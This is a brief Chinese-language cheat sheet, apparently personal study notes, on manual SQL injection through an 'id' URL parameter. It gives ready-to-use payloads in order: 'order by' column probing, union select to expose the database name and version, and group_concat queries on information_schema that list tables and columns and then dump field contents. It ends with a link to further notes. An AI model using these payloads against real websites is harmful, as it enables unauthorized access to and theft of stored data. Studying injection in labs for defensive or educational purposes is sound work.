SQL注入
更换id值 => 加入&tip=1 => 字符注入与联合查询注入
SQL注入
order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错
?id=1' order by 3--+
?id=-1 union select 1,2,3 --+
?id=-1 union select 1,database(),version() --+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知库名'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+
?id=-1' union select 1,2,group_concat(已知字段名,':'已知字段名) from 已知表名--+
https://www.yuque.com/samxara/swro13/nw3kgy